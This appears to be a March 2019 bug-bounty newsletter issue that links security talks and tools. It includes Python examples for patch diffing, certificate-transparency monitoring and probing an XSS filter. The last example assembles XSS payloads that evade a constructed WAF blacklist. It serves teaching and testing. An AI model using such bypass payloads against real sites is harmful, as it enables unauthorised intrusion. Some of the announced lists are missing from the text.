The 5 Hacking NewsLetter 86
Posted in Newsletter on December 31, 2019
Posted in Newsletter on March 19, 2019
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 8 to 15 March.
OWASP AppSec California 2019, especially:
- An Attacker’s View of Serverless and GraphQL Apps & Slides
- Endpoint Finder: A static analysis tool to find web endpoints, Slides & EndpointFinder
- Pose a Threat: How Perceptual Analysis Helps Bug Hunters & Slides
- Creating Accessible Security Testing with ZAP & Slides
- Cache Me If You Can: Messing with Web Caching & Slides
- Automated Account Takeover: The Rise of Single Request Attacks & Slides
- Open-source OWASP tools to aid in penetration testing coverage & Slides
- The Call is Coming From Inside the House: Lessons in Securing Internal Apps & Slides
OWASP AppSec conferences are great for anyone interested in (both offensive and defensive) Web app security. This one is particularly good, as you can judge from the list of talks above that I’m planning to watch!
Some of the topics addressed are: extracting endpoints from JS files, FaaS & GraphQL security, Web Caching vulnerabilities, scaling visual identification for bug hunters, new features in ZAP, interesting OWASP tools for white box pentesting…
The only thing missing is video or slides from the workshops, which look really interesting. Gonna have to go there myself some day!
Have you ever found an open port on a target where the service version had a CVE but no public exploit? This happens a lot, especially on (internal) pentests, where the number of open ports is generally much higher than in bug bounty.
This article is a great example of how to locate such a vulnerability, an RCE in this case, by diffing the patched version against the vulnerable one with diff (or rcdiff) and then reverse engineering only the code that changed.
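To show the "diff first, reverse second" idea in code, here is an added example (written for this newsletter, not code from the linked article) that diffs two constructed objdump-style listings and attributes every changed line to the function it lives in, so you know which function to open in the disassembler. The listings, function names and the `.Lbad` label are all made up for the example.

```python
"""Added example (not from the linked article): find which functions a patch
touched by diffing two disassembly listings and attributing every changed
line to the enclosing function label. Both listings below are constructed."""
import difflib

# Constructed objdump-style listing of the vulnerable build.
OLD_ASM = """\
<parse_header>:
  mov eax, dword [rdi]
  ret
<handle_request>:
  push rbx
  mov ebx, dword [rdi+0x10]
  lea rsi, [rdi+0x18]
  mov rdi, rsp
  mov edx, ebx
  call memcpy
  pop rbx
  ret
<cleanup>:
  xor eax, eax
  ret
"""

# The patched build adds a length check before the attacker-controlled memcpy
# (the .Lbad error path is assumed to live elsewhere in the listing).
NEW_ASM = OLD_ASM.replace(
    "  mov ebx, dword [rdi+0x10]\n",
    "  mov ebx, dword [rdi+0x10]\n  cmp ebx, 0x400\n  ja .Lbad\n",
)


def function_owners(lines):
    """For each line index, the name of the enclosing function ('<name>:' lines open one)."""
    owners, current = [], None
    for line in lines:
        if line.startswith("<") and line.endswith(">:"):
            current = line[1:-2]
        owners.append(current)
    return owners


def diff_by_function(old_text, new_text):
    """Return {function: {"removed": [...], "added": [...]}} for the regions that differ."""
    old, new = old_text.splitlines(), new_text.splitlines()
    owners = function_owners(old)
    changes = {}
    matcher = difflib.SequenceMatcher(a=old, b=new, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag == "equal":
            continue
        # An insertion has i1 == i2 and sits before old[i1]; blame the function of
        # the preceding line, or a block added right before a label would be
        # attributed to the wrong function.
        idx = max(i1 - 1, 0) if tag == "insert" else i1
        func = owners[min(idx, len(old) - 1)]
        entry = changes.setdefault(func, {"removed": [], "added": []})
        entry["removed"].extend(line.strip() for line in old[i1:i2])
        entry["added"].extend(line.strip() for line in new[j1:j2])
    return changes


def rank_candidates(changes):
    """Functions with the most added lines first: new checks are where a fix usually lands."""
    return sorted(changes, key=lambda f: -len(changes[f]["added"]))


if __name__ == "__main__":
    result = diff_by_function(OLD_ASM, NEW_ASM)
    for func in rank_candidates(result):
        print(f"{func}: +{len(result[func]['added'])} -{len(result[func]['removed'])}")
        for line in result[func]["added"]:
            print("   +", line)
```

On real targets you would feed it `objdump -d` output of both versions (or the text export of your disassembler); compiler noise such as shifted addresses should be stripped from the lines first, otherwise every function shows up as changed.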
This is a new recon tool by @yassineaboukir who also wrote Asnlookup. They’re both very handy tools for bug hunters.
Sublert monitors Certificate Transparency (CT) logs and notifies you via Slack when a new SSL/TLS certificate is issued for the organization you're monitoring.
What’s new compared to existing CT monitoring tools like Facebook’s CT tool or CertSpotter is that it was created by a bug hunter for bug hunters. It won’t spam you with irrelevant results, you can enable DNS resolution, disable monitoring for specific domains, and since it’s in Python, you can integrate it with any bug hunting (automated) scripts you are already using.
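To make the "no irrelevant results" point concrete, here is an added example (my own code, not Sublert's) of the filtering step such a monitor needs: collapse the certificates seen for an organization into hostnames, drop anything out of scope, report only what is new since the last run, and skip domains you have muted. The sample data is constructed and modelled on the JSON that crt.sh returns (the field name `name_value` is an assumption about that format); DNS resolution is left out so it runs offline.

```python
"""Added example (not Sublert's code): the filtering step of a bug-hunter style
CT-log monitor. Given the certificates seen for an organization, emit only the
hostnames that are new since the last run and not under an excluded domain."""
import json
import re

# Hostname sanity check so junk in a SAN field never reaches a Slack message.
HOSTNAME_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$")

# Constructed sample, modelled on crt.sh JSON output (field names are an
# assumption; "name_value" is taken to carry the SANs, newline-separated).
CT_RESULTS_JSON = json.dumps([
    {"name_value": "www.example.com\nexample.com", "not_before": "2019-03-08T10:00:00"},
    {"name_value": "*.staging.example.com", "not_before": "2019-03-09T11:00:00"},
    {"name_value": "jenkins-ci.internal.example.com\nvpn.example.com",
     "not_before": "2019-03-12T09:30:00"},
    {"name_value": "WWW.Example.COM", "not_before": "2019-03-13T08:00:00"},
    {"name_value": "example.com.evil.test", "not_before": "2019-03-14T08:00:00"},
])


def in_scope(hostname, org_domain):
    """True for org_domain itself and anything below it (suffix match on a label boundary)."""
    return hostname == org_domain or hostname.endswith("." + org_domain)


def extract_hostnames(ct_json, org_domain):
    """Collapse CT results to a set of normalised, in-scope hostnames."""
    seen = set()
    for entry in json.loads(ct_json):
        for raw in entry["name_value"].split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):
                name = name[2:]  # a wildcard only proves the base name exists
            if HOSTNAME_RE.match(name) and in_scope(name, org_domain):
                seen.add(name)
    return seen


def new_hostnames(current, known, excluded):
    """Hostnames not reported before and not under any excluded (muted) domain."""
    fresh = current - known
    return sorted(h for h in fresh if not any(in_scope(h, ex) for ex in excluded))


def slack_message(org_domain, hostnames):
    """Text for a Slack webhook payload; None when there is nothing worth posting."""
    if not hostnames:
        return None
    body = "\n".join(f"- {h}" for h in hostnames)
    return f"New certificates for {org_domain}:\n{body}"


if __name__ == "__main__":
    known = {"example.com", "www.example.com"}     # state from the previous run
    excluded = {"staging.example.com"}             # muted: too noisy to report
    current = extract_hostnames(CT_RESULTS_JSON, "example.com")
    fresh = new_hostnames(current, known, excluded)
    print(slack_message("example.com", fresh))
    known |= set(fresh)  # persist this set between runs
```

The suffix check in `in_scope` is deliberate: `example.com.evil.test` ends with the string `example.com` but not with `.example.com`, and a naive `"example.com" in name` test would happily alert on it.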
This is an awesome presentation if you’re into mobile app testing! It’s understandable even without video.
The question answered is: how do you test the security of an app if for some reason you can’t use a rooted/jailbroken device? This happens when the app refuses to run on a rooted device, or when it requires an iOS version that doesn’t have a public jailbreak.
The solutions explained, including commands and resources, are:
This is a great resource for learning how to bypass WAFs for XSS, by the author of XSStrike & Photon.
I often see people sharing complex XSS payloads on Twitter. But without context, I don't find them very useful. This paper is a much better resource for understanding what filters do and how to bypass them with a solid methodology, as opposed to randomly running a list of payloads.
The steps proposed are:
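To illustrate the methodical approach the paragraph above argues for, here is an added example (my own code, not the paper's and not XSStrike's): instead of firing a payload list, it probes the filter one component at a time (tag, event handler, JavaScript call) and assembles a payload only from parts that survive. The "WAF" is a constructed set of blacklist rules standing in for a target, not any real product's rule set.

```python
"""Added example (not the paper's code and not XSStrike): probe an XSS filter one
component at a time, tags, then event handlers, then the JavaScript call, and
assemble a payload only from parts the filter lets through."""
import re

TAGS = ["script", "iframe", "svg", "img", "details", "video"]
HANDLERS = ["onerror", "onload", "onmouseover", "ontoggle", "onfocus"]
CALLS = ["alert(1)", "confirm(1)", "alert`1`", "prompt(1)"]

# Constructed stand-in for a target's filter: a handful of blacklist rules of
# the kind WAFs ship with. Hypothetical, not any real product's rule set.
DEMO_RULES = [
    r"<\s*(script|iframe)\b",
    r"\bon(error|load)\s*=",
    r"javascript:",
    r"alert\s*\(",
]


def blocked_by_demo_waf(payload):
    """Case-insensitive blacklist match; True means the request would be dropped."""
    p = payload.lower()
    return any(re.search(rule, p) for rule in DEMO_RULES)


def probe(candidates, template, is_blocked):
    """Substitute each candidate into the template on its own and keep the survivors.
    Testing parts in isolation tells you which rule fired; a full payload never does."""
    return [c for c in candidates if not is_blocked(template.format(c))]


def build_payload(is_blocked):
    """Assemble a payload from surviving parts; None if a whole stage is blocked."""
    tags = probe(TAGS, "<{}>", is_blocked)
    handlers = probe(HANDLERS, "<x {}=1>", is_blocked)   # neutral tag isolates the handler
    calls = probe(CALLS, "<x y={}>", is_blocked)         # neutral attribute isolates the call
    # Re-check the combination: a rule may match only when parts appear together.
    for tag in tags:
        for handler in handlers:
            for call in calls:
                payload = f"<{tag} {handler}={call}>"
                if not is_blocked(payload):
                    return payload
    return None


if __name__ == "__main__":
    print("tags:", probe(TAGS, "<{}>", blocked_by_demo_waf))
    print("handlers:", probe(HANDLERS, "<x {}=1>", blocked_by_demo_waf))
    print("calls:", probe(CALLS, "<x y={}>", blocked_by_demo_waf))
    print("payload:", build_payload(blocked_by_demo_waf))
```

Against a real target `is_blocked` would be a function that sends the probe and inspects the response (status code, block page, reflected or not); the structure stays the same. The assembled payload still has to be valid for the browser, so pair handlers with tags that actually fire them.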
See more writeups on The list of bug bounty writeups.
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 03/08/2019 to 03/15/2019
Have a nice week folks!
If you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…